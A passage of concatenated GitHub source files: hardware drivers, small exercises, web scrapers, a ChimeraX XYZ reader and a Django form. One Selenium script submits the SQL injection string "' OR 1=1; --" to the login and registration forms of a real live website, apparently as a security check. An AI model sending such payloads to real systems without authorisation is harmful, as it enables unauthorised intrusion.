kwargs.pop('oid', '%s.pwm'%OID)\n name = kwargs.pop('name', \"Motor\")\n product_name = kwargs.pop('product_name', \"PWM channel\")\n product_type = kwargs.pop('product_type', \"PWM channel\")\n product_manufacturer = kwargs.pop('product_manufacturer', \"Janitoo\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, product_manufacturer=product_manufacturer, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n uuid=\"level\"\n self.values[uuid] = self.value_factory['action_switch_multilevel'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The level of the LED. A byte from 0 to 100',\n label='Level',\n default=0,\n set_data_cb=self.set_level,\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n uuid=\"max_level\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help=\"The max level supported by the LED. Some LED doesn't seems support 100% PWM. A byte from 0 to 100\",\n label='Max level',\n default=100,\n )\n uuid=\"num\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The number of the LED on the board. A byte from 0 to 15',\n label='Num.',\n )\n uuid=\"switch\"\n self.values[uuid] = self.value_factory['action_switch_binary'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n set_data_cb=self.set_switch,\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n\n def set_level(self, node_uuid, index, data):\n \"\"\"Set the level ot the LED\n \"\"\"\n p = self.values['num'].get_data_index(index=index)\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.set_pwm(p, int(data*4096/100),0)\n self.values['level'].set_data_index(index=index, data=data)\n except Exception:\n logger.warning(\"[%s] - set_level invalid data : %s\", self.__class__.__name__, data)\n finally:\n self._bus.i2c_release()\n\n def set_switch(self, node_uuid, index, data):\n \"\"\"Switch On/Off the led\n \"\"\"\n if data == \"on\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 4096, 0)\n self.values['level'].set_data_index(index=index, data=100)\n except Exception:\n logger.exception('[%s] - Exception when switching on', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n elif data == \"off\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 0, 4096)\n self.values['level'].set_data_index(index=index, data=0)\n except Exception:\n logger.exception('[%s] - Exception when switching off', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n else:\n logger.warning(\"[%s] - set_switch unknown data : %s\", self.__class__.__name__, data)\n\nclass ServoComponent(JNTComponent):\n \"\"\" A servo component\"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.servo'%OID)\n name = kwargs.pop('name', \"Servo\")\n product_name = kwargs.pop('product_name', \"Servo\")\n product_type = kwargs.pop('product_type', \"Servo\")\n product_manufacturer = kwargs.pop('product_manufacturer', \"Janitoo\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, 
product_manufacturer=product_manufacturer, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n uuid=\"num\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The number of the servo on board. A byte from 0 to 15',\n label='Num.',\n )\n uuid=\"pulse_min\"\n self.values[uuid] = self.value_factory['config_integer'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The minimal pulse',\n label='Pulsemin',\n default=200,\n )\n uuid=\"pulse_max\"\n self.values[uuid] = self.value_factory['config_integer'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The maximal pulse',\n label='Pulsemax',\n default=700,\n )\n uuid=\"angle\"\n self.values[uuid] = self.value_factory['action_string'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n set_data_cb=self.set_angle,\n help='Set the angle of the servo. Format is value|angle_min|angle_max',\n label='angle',\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n\n def translate(self, value, left_min, left_max, right_min=None, right_max=None):\n \"\"\" Translate a value in a range to a value in the servo's limits\n \"\"\"\n if right_min is None:\n right_min = self.values['pulse_min'].data\n if right_max is None:\n right_max = self.values['pulse_max'].data\n # Figure out how 'wide' each range is\n left_span = left_max - left_min\n right_span = right_max - right_min\n # Convert the left range into a 0-1 range (float)\n value_scaled = float(value - left_min) / float(left_span)\n # Convert the 0-1 range into a value in the right range.\n return int(right_min + (value_scaled * right_span))\n\n def set_angle(self, node_uuid, index, data, pin=None):\n \"\"\" Change the angle of the servo\n \"\"\"\n self._bus.i2c_acquire()\n try:\n if pin is None:\n pin = self.values['num'].data\n angle, angle_min, angle_max = data.split('|')\n value = self.translate(float(angle), float(angle_min), float(angle_max))\n logger.debug('[%s] - set_angle on pin %s to %s', self.__class__.__name__, pin, angle)\n self._bus.pca9685_manager.set_pwm(pin, 0, value)\n self.values['angle']._data = data\n except Exception:\n logger.exception('[%s] - Exception when set_angle', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n","repo_name":"bibi21000/janitoo_raspberry_i2c_pca9685","sub_path":"src/janitoo_raspberry_i2c_pca9685/pca9685.py","file_name":"pca9685.py","file_ext":"py","file_size_in_byte":15466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"29175585522","text":"# define variables\nshopList = []\n\n# list function to print out list\ndef listFunc(shopList, n):\n for n in range(len(shopList)):\n print(shopList[n])\n\n# Input number of fruits to go into the list\nnumberOfFruits = int(input(\"Enter number of elements in the list : \"))\n\n# enter your list of fruits one by one\nfor i in range(0, numberOfFruits):\n item = input(\"Enter your Item to the List: \")\n shopList.append(item) # adding the element\n\n# call your list function!\nlistFunc(shopList, numberOfFruits)\n","repo_name":"Nyas162/Junior-Girl-Scouts","sub_path":"activity3-part2.py","file_name":"activity3-part2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"21473795345","text":"#program 11\n\nimport matplotlib.pyplot as plt \n#sample data for 
monthly sales\nmonths=['jan','feb','mar','apr','may']\nsales=[10000,12000,8000,15000,11000]\n\n#creating a line plot\nplt.plot(months,sales,marker='o')\nplt.xlabel('months')\nplt.ylabel('sales')\nplt.title('monthly sales prediction')\nplt.grid(True)\nplt.show()\nprint()\n#scatter plot\nplt.scatter(months,sales)\nplt.xlabel('months')\nplt.ylabel('sales')\nplt.title('monthly sales prediction')\nplt.grid(True)\nplt.show()\n#bar plot\nplt.bar(months,sales)\nplt.xlabel('months')\nplt.ylabel('sales')\nplt.title('monthly sales prediction')\nplt.grid(True)\nplt.show()\n","repo_name":"USMK12/Data-Science","sub_path":"exp_program-11.py","file_name":"exp_program-11.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"28402493067","text":"import pandas as pd\r\nfrom scipy import stats\r\nimport matplotlib.pyplot as plt\r\n\r\ndata1 = pd.read_csv('data-1.csv')\r\ndata1_x_mean = data1['x'].mean()\r\ndata1_y_mean = data1['y'].mean()\r\n\r\ndata1_x_std = data1['x'].std()\r\ndata1_y_std = data1['y'].std()\r\n\r\ndata1_x_min = data1['x'].min()\r\ndata1_y_min = data1['y'].min()\r\n\r\ndata1_x_max = data1['x'].max()\r\ndata1_y_max = data1['y'].max()\r\n\r\n# correlation - r\r\ndata1_r = stats.linregress(data1['x'], data1['y']).rvalue\r\nprint (data1_r)\r\n\r\n# use scatter plot to visually verify if they are correlated\r\nplt.scatter(data1['x'], data1['y'])\r\nplt.title('data-1 correlation scatter plot')\r\nplt.show()","repo_name":"tomliangg/Reddit_Weekends","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27257526689","text":"import re\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport aiohttp\r\nimport time\r\n\r\nheaders={\r\n 'User-Agent': \"Mozilla/5.0 (X11; CrOS x86_64 12871.102.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.141 Safari/537.36\"\r\n}\r\n\r\n\r\n\r\nasync def main(urls,startnum,ix):\r\n async with aiohttp.ClientSession(trust_env=True) as session:\r\n ret = await asyncio.gather(*[get(url,session,startnum+i,ix) for i,url in enumerate(urls)])\r\n print(\"Finalized all. 
Return is a list of len {} outputs.\".format(len(ret)))\r\n return ret\r\nasync def get(url, session,startnum,i):\r\n #print(url)\r\n try:\r\n async with session.get(url=url,headers=headers,timeout=12) as response:\r\n resp = await response.read()\r\n print(\"{}: Successfully got url {} with resp of length {}.\".format(startnum,url, len(resp)))\r\n if(resp is not None):\r\n #print(resp)\r\n try:\r\n soup = BeautifulSoup(resp,'lxml')\r\n data = soup.find_all('script',attrs={ \"data-hypernova-key\" :\"yelpfrontend__5460__yelpfrontend__GondolaSearch__dynamic\" })# attrs={ \"data-hypernova-key\" :\"yelpfrontend__54515__yelpfrontend__GondolaSearch__dynamic\" }\r\n datastr = data[0].getText()[4:-4]\r\n arridx=[m.start() for m in re.finditer('{\"ranking\":', datastr)]\r\n arridy=[m.start() for m in re.finditer(',\"scrollablePhotos\":', datastr)]\r\n loaded = []\r\n #print(datastr)\r\n for z in range(10):\r\n loaded.append(json.loads(datastr[arridx[z]:arridy[z]]))\r\n #print(json.loads(datastr[arridx[z]:arridy[z]]))\r\n\r\n if loaded[z]['website'] is not None:\r\n loaded[z]['website']=loaded[z]['website']['href']\r\n # print(loaded[z]['website'])\r\n df = pd.DataFrame(loaded)\r\n return df\r\n # df.to_csv(\"data.csv\",mode='a') \r\n except:\r\n i.write(url+'\\n')\r\n pass\r\n\r\n except Exception as e:\r\n try:\r\n print(\"{}: Unable to get url {} due to {}.\".format(startnum,url, e.__class__))\r\n i.write(url+'\\n')\r\n # errors.add(url)\r\n return None\r\n except:\r\n print(\"error\")\r\ndef chonk(arrdata,chonksize):\r\n chonk = []\r\n chonkytonk = []\r\n count = 0\r\n for x in arrdata:\r\n chonk.append(x)\r\n #print(x)\r\n if count>chonksize:\r\n count = 0\r\n chonkytonk.append(chonk)\r\n chonk = []\r\n count = count +1\r\n return chonkytonk\r\n\r\ndef y():\r\n\r\n # btype = [\"bakeries\",\"cafe\"]\r\n # baseurl = 'https://www.yelp.com/search?find_desc='\r\n # locurl = '&find_loc='\r\n # #https://www.yelp.com/search?find_desc=cafe&find_loc=toyko+japan\r\n # start_urls=[]\r\n # start_index = 0\r\n\r\n # for i in range(len(cities)):\r\n # for b in btype:\r\n # start_urls.append(baseurl+str(b)+str(locurl)+cities[i])\r\n # for c in range(1,24):\r\n # start_urls.append(baseurl+str(b)+str(locurl)+str(cities[i])+\"&start=\"+str(c*10))\r\n #start_urls = start_urls[0:4]\r\n\r\n # chonk = []\r\n # chonkytonk = []\r\n # chonksize = 10\r\n # count = 0\r\n # for x in start_urls:\r\n # chonk.append(x)\r\n # #print(x)\r\n # if count>chonksize:\r\n # count = 0\r\n # chonkytonk.append(chonk)\r\n # chonk = []\r\n # count = count +1\r\n startfile = 210\r\n endfile = 214\r\n startindex = 3185\r\n chonksize = 7\r\n for x in range(startfile,endfile):\r\n f = open(\"city-\"+str(x)+\".txt\",\"r\",encoding=\"utf-8\")\r\n start_urls = f.read().split(\"\\n\")\r\n f.close()\r\n start_urls = start_urls[startindex:]\r\n chonkytonk = chonk(start_urls,chonksize)\r\n #print(chonkytonk)\r\n for chunk in chonkytonk:\r\n # g = open(\"testing.txt\",\"a\",encoding='utf')\r\n # g.write('\\n'.join(chunk)+\"\\n\")\r\n # g.close()\r\n i = open(\"yelp_error.txt\",\"a\",encoding=\"utf-8\")\r\n df = asyncio.run(main(chunk,startindex,i))\r\n i.close()\r\n try:\r\n for y in df:\r\n print(x)\r\n y.to_csv(\"data-\"+str(x)+\".csv\",mode='a',header=None,index=False)\r\n except:\r\n pass\r\n time.sleep(4)\r\n del df\r\n # print(chunk)\r\n startindex = startindex+chonksize+1\r\n startindex = 
0\r\n\r\ny()\r\n","repo_name":"holdings420/YelpScraper","sub_path":"yelp.py","file_name":"yelp.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70986747712","text":"class Node:\n \"\"\"링크드 리스트의 노드 클래스\"\"\"\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nhead = Node(0)\nnode_1 = Node(1)\nnode_2 = Node(2)\nnode_3 = Node(3)\nnode_4 = Node(4)\nnode_5 = Node(5)\n\nhead.next = node_1\nnode_1.next = node_2\nnode_2.next = node_3\nnode_3.next = node_4\nnode_4.next = node_5\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def append(self, node):\n if not self.head:\n self.head = node\n self.tail = node\n else:\n current_node = self.head\n while current_node.next:\n current_node = current_node.next\n current_node.next = node\n self.tail = node\n\n def find_node_at(self, index):\n if index == 0:\n return self.head\n else:\n node = self.head\n i = 0\n while i != index:\n node = node.next\n i += 1\n return node\n\n\n\n\n\n\n","repo_name":"Einsicht1/self-taught-developer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11400859010","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom faker import Faker\n\n\ndef auth_form_check():\n try:\n driver = webdriver.Chrome()\n driver.get(\"https://www.rerum.cz/prihlaseni\")\n\n # Cookie pop up\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll\"]'))).click()\n wait = WebDriverWait(driver, 10)\n\n email_element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.NAME, 'login'))).send_keys(\"' OR 1=1; --\")\n password_element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'login_password'))).send_keys(\"' OR 1=1; --\")\n\n submit_button = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/main/div/div/div[1]/div[2]/form/input[3]')))\n submit_button.click()\n \n WebDriverWait(driver, 10).until(EC.alert_is_present())\n\n except Exception as e:\n print(f\"Test auth_form_check passed: SQL injection protection is effective {str(e)}\") \n\n finally:\n driver.quit() \n\nauth_form_check()\n\n\ndef registration_form_check_test1():\n try:\n driver = webdriver.Chrome()\n driver.get(\"https://www.rerum.cz/\")\n\n # Cookie pop up\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll\"]'))).click()\n wait = WebDriverWait(driver, 10)\n\n \n form_button_locator = driver.find_element(by=By.ID, value='get-credit-frontpage')\n form_button_locator.click()\n\n # 1 registration page \n wait = WebDriverWait(driver, 10)\n driver.find_element(by=By.NAME, value='contract_accept').click()\n name_input = wait.until(EC.presence_of_element_located((By.NAME, 'realname')))\n surname_input = wait.until(EC.presence_of_element_located((By.NAME, 'surname')))\n email_input = wait.until(EC.presence_of_element_located((By.ID, 'email')))\n mob_phone_input = wait.until(EC.presence_of_element_located((By.ID, 'mob_phone')))\n submit_button = wait.until(EC.element_to_be_clickable((By.XPATH, 
'//input[@value=\"Pokračovat\"]')))\n\n name_input.send_keys(\"' OR 1=1; --\")\n surname_input.send_keys(\"' OR 1=1; --\")\n email_input.send_keys(\"' OR 1=1; --\")\n mob_phone_input.send_keys(\"' OR 1=1; --\")\n submit_button.click()\n \n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n print(\"ok\") \n finally:\n driver.quit()\n \n# registration_form_check_test1() \n","repo_name":"EkaterinaO19/selenium","sub_path":"sql_injections.py","file_name":"sql_injections.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74936598590","text":"# vim: set expandtab shiftwidth=4 softtabstop=4:\n\n\ndef open_xyz(session, stream):\n \"\"\"Read an XYZ file from a file-like object.\n\n Returns the 2-tuple return value expected by the\n \"open command\" manager's :py:meth:`run_provider` method.\n \"\"\"\n structures = []\n line_number = 0\n atoms = 0\n bonds = 0\n while True:\n s, line_number = _read_block(session, stream, line_number)\n if not s:\n break\n structures.append(s)\n atoms += s.num_atoms\n bonds += s.num_bonds\n status = (\"Opened XYZ file containing %d structures (%d atoms, %d bonds)\" %\n (len(structures), atoms, bonds))\n return structures, status\n\n\ndef _read_block(session, stream, line_number):\n # XYZ files are stored in blocks, with each block representing\n # a set of atoms. This function reads a single block\n # and builds a ChimeraX AtomStructure instance containing\n # the atoms listed in the block.\n\n # First line should be an integer count of the number of\n # atoms in the block.\n count_line = stream.readline()\n if not count_line:\n # Reached EOF, normal termination condition\n return None, line_number\n line_number += 1\n try:\n count = int(count_line)\n except ValueError:\n session.logger.error(\"line %d: atom count missing\" % line_number)\n return None, line_number\n\n # Create the AtomicStructure instance for atoms in this block.\n # All atoms in the structure are placed in one residue\n # since XYZ format does not partition atoms into groups.\n from chimerax.atomic import AtomicStructure\n from numpy import array, float64\n s = AtomicStructure(session)\n residue = s.new_residue(\"UNK\", 'A', 1)\n\n # XYZ format supplies the atom element type only, but\n # ChimeraX keeps track of both the element type and\n # a unique name for each atom. 
To construct the unique\n # atom name, the # 'element_count' dictionary is used\n # to track the number of atoms of each element type so far,\n # and the current count is used to build unique atom names.\n element_count = {}\n\n # Next line is a comment line\n s.comment = stream.readline().strip()\n line_number += 1\n\n # There should be \"count\" lines of atoms.\n for n in range(count):\n atom_line = stream.readline()\n if not atom_line:\n session.logger.error(\"line %d: atom data missing\" % line_number)\n return None, line_number\n line_number += 1\n\n # Extract available data\n parts = atom_line.split()\n if len(parts) != 4:\n session.logger.error(\"line %d: atom data malformatted\"\n % line_number)\n return None, line_number\n\n # Convert to required parameters for creating atom.\n # Since XYZ format only required atom element, we\n # create a unique atom name by putting a number after\n # the element name.\n xyz = [float(v) for v in parts[1:]]\n element = parts[0]\n n = element_count.get(element, 0) + 1\n name = element + str(n)\n element_count[element] = n\n\n # Create atom in AtomicStructure instance 's',\n # set its coordinates, and add to residue\n atom = s.new_atom(name, element)\n atom.coord = array(xyz, dtype=float64)\n residue.add_atom(atom)\n\n # Use AtomicStructure method to add bonds based on interatomic distances\n s.connect_structure()\n\n # Updating state such as atom types while adding atoms iteratively\n # is unnecessary (and generally incorrect for partial structures).\n # When all atoms have been added, the instance is notified to\n # tell it to update internal state.\n s.new_atoms()\n\n # Return AtomicStructure instance and current line number\n return s, line_number\n\n\ndef save_xyz(session, path, structures=None):\n \"\"\"Write an XYZ file from given models, or all models if None.\n \"\"\"\n # Open path with proper encoding; 'open_output' automatically\n # handles compression if the file name also has a compression\n # suffix (e.g. 
.gz)\n from chimerax.io import open_output\n f = open_output(path, session.data_formats['XYZ'].encoding)\n\n # If no models were given, use all atomic structures\n if structures is None:\n from chimerax.atomic import AtomicStructure\n structures = session.models.list(type=AtomicStructure)\n num_atoms = 0\n\n # Loop through structures and print atoms\n for s in structures:\n # We get the list of atoms and transformed atomic coordinates\n # as arrays so that we can limit the number of accesses to\n # molecular data, which is slower than accessing arrays directly\n atoms = s.atoms\n coords = atoms.scene_coords\n\n # First line for a structure is the number of atoms\n print(str(s.num_atoms), file=f)\n # Second line is a comment\n print(getattr(s, \"name\", \"unnamed\"), file=f)\n # One line per atom thereafter\n for i in range(len(atoms)):\n a = atoms[i]\n c = coords[i]\n print(\"%s %.3f %.3f %.3f\" % (a.element, c[0], c[1], c[2]), file=f)\n num_atoms += s.num_atoms\n f.close()\n\n # Notify user that file was saved\n session.logger.status(\"Saved XYZ file containing %d structures (%d atoms)\"\n % (len(structures), num_atoms))\n # No return value\n","repo_name":"RBVI/ChimeraX","sub_path":"src/examples/tutorials/tut_save/src/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":5397,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"60"} +{"seq_id":"6608672499","text":"from django import forms\nfrom .models import UserProfile\nfrom django.conf import settings\n\nclass UserProfileForm(forms.ModelForm):\n select_classes = [\n ('class i', 'Class I'),\n ('class ii', 'Class II'),\n ('class iii', 'Class III'),\n ('class iv', 'Class IV'),\n ('class v', 'Class V'),\n ('class vi', 'Class VI'),\n ('class vii', 'Class VII'),\n ('class viii', 'Class VIII'),\n ('class ix', 'Class IX'),\n ('class x', 'Class X'),\n ('class xi', 'Class XI'),\n ('class xii', 'Class XII'),\n ]\n \n select_class = forms.ChoiceField(choices=select_classes, required=False)\n\n class Meta:\n model = UserProfile\n fields = [\n 'full_name',\n 'email',\n 'profile_image',\n 'address',\n 'phone_number',\n 'mode',\n 'skills',\n 'subjects',\n 'password',\n 'role',\n ]\n \n def clean_profile_image(self):\n profile_image = self.cleaned_data.get('profile_image')\n if profile_image:\n if profile_image.size > settings.MAX_UPLOAD_SIZE:\n raise forms.ValidationError(\"File size is too large. 
Maximum allowed size is 5MB.\")\n return profile_image\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image.\")\n","repo_name":"younikingneerajgupta/lifemastryconnect.com","sub_path":"UserRegistrationForm/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8132033038","text":"from django.urls import path\n\nfrom profile_module import views\n\nurlpatterns = [\n path('', views.Profile.as_view(), name='tabpane_profile'),\n\n path('update/status', views.set_status, name='set_status'),\n path('update/personal-form', views.PersonalInfo.as_view(), name='personal_form'),\n path('update', views.Settings.as_view(), name='tabpane_settings'),\n path('update/avatar', views.save_avatar, name='save_avatar'),\n]\n","repo_name":"MHMK2002/chat_box","sub_path":"profile_module/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"29554407396","text":"# -*- coding: utf-8 -*-\n\nfrom utils import converter as cvt\nimport numpy as np\nimport sys\nimport argparse\n\nCONFIG_PATH = \"../config/atomMap.txt\"\nDB_PATH = \"../demoDB/smiles\"\nWORK_DIR = \"../out/work\"\nOUT_DIR = \"../out/svg\"\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"convert smiles format 2 adjancy matrix\")\n parser.add_argument('id', help=\"data id for demo\")\n\n args = parser.parse_args()\n data_id = args.id\n Converter = cvt.Converter(CONFIG_PATH)\n data_path = DB_PATH + \"/\" + data_id + \".txt\"\n try:\n Converter.read(data_path)\n print(\"reader done\")\n except Exception as e:\n print(e)\n sys.exit()\n\n A, v = Converter.mol2adjancy()\n\n id_label_dict = {int(k): int(v) for (k, v) in v}\n try:\n dfs_v, dfs_e = Converter.adjancy2dfs(A, id_label_dict)\n except Exception as e:\n print(e)\n sys.exit()\n\n # convert DFS2Mol\n Converter.graphSVG(OUT_DIR + \"/test.svg\",\n Converter.dfs2Molbolck(dfs_v, dfs_e, WORK_DIR))\n","repo_name":"se-z/Chemo-Graph-Convert-utils","sub_path":"src/test_5_mol2svg.py","file_name":"test_5_mol2svg.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"789255621","text":"#!/usr/bin/python3\n\nimport skimage.io\nimport os\n\nShapes = set()\nfor f in os.listdir('Images'):\n img = skimage.io.imread(os.path.join('Images', f))\n Shapes.add((img.shape[0], img.shape[1]))\n\nprint(Shapes)\n","repo_name":"ajfabian/Affective-Computing","sub_path":"find_min_rect.py","file_name":"find_min_rect.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2079091788","text":"def not_hesapla(satır):\n\n satır=satır[:-1] # satırlar arasında ki boşluğu ortadan kaldırıyor\n liste = satır.split(\",\") #herbir elemanı virgüle göre parçala ve her satırı listeye at\n\n #bir satır içindeki verileri parça parça değişkenlerde tuttuk\n isim = liste[0]\n not1 = int(liste[1])\n not2 = int(liste[2])\n not3 = int(liste[3])\n\n son_not = not1 * (3/10) + not2 * (3/10) + not3 * (4/10)\n\n\n if (son_not>=90):\n harf = \"AA\"\n\n elif (son_not>=85):\n harf = \"BA\"\n\n elif (son_not>=80):\n harf = \"BB\"\n\n elif (son_not>=75):\n harf = \"CB\"\n\n elif (son_not>=70):\n harf = \"CC\"\n\n elif (son_not>=65):\n harf = \"DC\"\n\n elif 
(son_not>=60):\n harf = \"DD\"\n\n elif (son_not>=55):\n harf = \"FD\"\n\n else:\n harf = \"FF\"\n\n return isim +\"=\" + harf + \"\\n\"\n\n\n\n\nwith open(\"sinif.txt\",\"r\",encoding=\"utf-8\") as file:\n\n eklenecekler_listesi=[]\n geçenler_listesi=[]\n kalanlar_listesi=[]\n for i in file:\n eklenecekler_listesi.append(not_hesapla(i))\n\n print(eklenecekler_listesi)\n\n for i in eklenecekler_listesi:\n i = i[:-1]\n liste = i.split(\"=\")\n \n isim=liste[0]\n harf=liste[1]\n\n if (harf == \"FF\"):\n kalanlar_listesi.append(i)\n else:\n geçenler_listesi.append(i)\n\n\n with open (\"notlar.txt\",\"w\",encoding=\"utf-8\") as file2:\n for i in eklenecekler_listesi:\n file2.write(i)\n\n\n with open (\"gecenler.txt\",\"w\",encoding=\"utf-8\") as geçen:\n for i in geçenler_listesi:\n geçen.write(i)\n geçen.write(\"\\n\")\n\n with open (\"kalanlar.txt\",\"w\",encoding=\"utf-8\") as kalan:\n for i in kalanlar_listesi:\n kalan.write(i)\n kalan.write(\"\\n\")\n","repo_name":"BusraOzer/PythonExercises","sub_path":"9FileOperations/SinifinHarfNotunuHesaplama.py","file_name":"SinifinHarfNotunuHesaplama.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37746361238","text":"import datetime\nimport re\nfrom datetime import datetime\n\nimport requests\nfrom lxml import html\n\n# Make sure to use Dutch date formats\nimport locale\nlocale.setlocale(locale.LC_TIME, \"nl_NL.utf8\")\n\nURL_TEMPLATE = \"https://www.pvda.nl/nieuws/page/{page}\"\nURL_ROOT = \"https://www.pvda.nl/nieuws\"\n\ndef get_css(tree, selection, text=True, error=True):\n res = tree.cssselect(selection)\n if len(res) != 1:\n if not error:\n return None\n # raise ValueError(\"Selection {selection} yielded {n} results\".format(n=len(res), **locals()))\n raise Warning(\"Selection {selection} yielded {n} results\".format(n=len(res), **locals()))\n return res[0]\n \ndef scrape_pb(url, date, headline):\n print(url)\n page = requests.get(url)\n tree = html.fromstring(page.text)\n lead = tree.cssselect(\"div.siteorigin-widget-tinymce.textwidget\")\n lead = lead[0].text_content()\n author = tree.cssselect(\"div.related-excerpt h2\")\n if not author:\n author =\"PvdA\"\n else:\n author = author[0].text_content().strip()\n quotes = tree.cssselect(\"div.content blockquote\")\n quote = []\n for q in quotes:\n q2 = q.text_content()\n quote.append(q2)\n quote = \"\\n\\n\".join(quote)\n content = tree.cssselect(\"div.content\")\n body2=[]\n for cont in content:\n text = cont.text_content()\n body2.append(text)\n body2 = \"\\n\\n\".join(body2)\n return {\"headline\": headline,\n \"lead\": lead,\n \"text\": body2,\n \"author\": author,\n \"date\": date,\n \"medium\": \"PvdA site\",\n \"quotes\": quote,\n \"url\": url}\n\ndef get_links():\n for page in range(1, 823):\n url = URL_TEMPLATE.format(**locals())\n print(url)\n page = requests.get(url)\n open(\"/tmp/test.html\",\"w\").write(page.text)\n tree = html.fromstring(page.text)\n posts = tree.cssselect(\".partial-post\")\n for post in posts:\n # is hetzelfde als de title,= notatie\n #titles = post.cssselect(\"h2\")\n #if len(titles) != 1:\n # raise Exception(\"Boe\")\n #title = titles[0]\n link, = post.cssselect(\"h2 > a\")\n href = link.get(\"href\")\n if not href.startswith(\"https://www.pvda.nl/nieuws/\"):\n continue\n else:\n headline = link.text_content().strip()\n meta, = post.cssselect(\"span.meta\")\n datestr = meta.text_content()\n m = re.match(r\"(\\d+ \\w+ \\d{4})\", datestr.strip())\n if not 
\n raise ValueError(f\"Cannot parse date: {datestr}\")\n datestr2 = m.group(1)\n date = datetime.strptime(datestr2, \"%d %B %Y\")\n yield date, headline, href\n\n#a = scrape_pb(\"/actueel/nieuws/2019/03/04/reactie-minister-blok-op-het-terugroepen-van-de-nederlandse-ambassadeur-uit-iran\")\n#print(a)\n#sys.exit()\nfrom amcatclient import AmcatAPI\nconn = AmcatAPI(\"https://amcat.nl\")\nfor date, headline, href in get_links():\n a = scrape_pb(href, date, headline)\n conn.create_articles(2051, 80339, [a])\n \n","repo_name":"nruigrok/fbpostscraper","sub_path":"pvda.py","file_name":"pvda.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"}
